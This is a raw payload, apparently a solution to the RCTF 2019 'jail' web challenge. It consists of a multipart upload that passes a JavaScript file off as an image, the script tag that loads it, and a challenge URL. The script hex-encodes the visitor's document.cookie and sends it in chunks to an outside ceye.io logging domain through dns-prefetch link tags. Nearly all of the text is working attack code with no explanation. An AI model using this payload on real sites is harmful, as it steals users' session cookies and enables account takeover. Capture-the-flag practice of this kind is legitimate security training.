------WebKitFormBoundarybXxDCVlf6JTYKHpj
Content-Disposition: form-data; name="avatar"; filename="a.js"
Content-Type: image/jpeg

function String2Hex(tmp) {
    var str = '';
    for(var i = 0; i < tmp.length; i++) {
        str += tmp[i].charCodeAt(0).toString(16);
    }
    return str;
}
var i=document.createElement('link');
i.setAttribute('rel','dns-prefetch');
i.setAttribute('href','//'+String2Hex(document.cookie.substr(0,30))+'.******.ceye.io');
document.head.appendChild(i);
var i=document.createElement('link');
i.setAttribute('rel','dns-prefetch');
i.setAttribute('href','//'+String2Hex(document.cookie.substr(30,30))+'.******.ceye.io');
document.head.appendChild(i);

----------------------------------------------------------------------------------------------------

<script language=javascript src=/uploads/84d6454a744b0446bdac29a037847aa3.js></script>

----------------------------------------------------------------------------------------------------

https://jail.2019.rctf.rois.io/?action=post&id=19f5714e5b4f6690b091a2d5dd027511
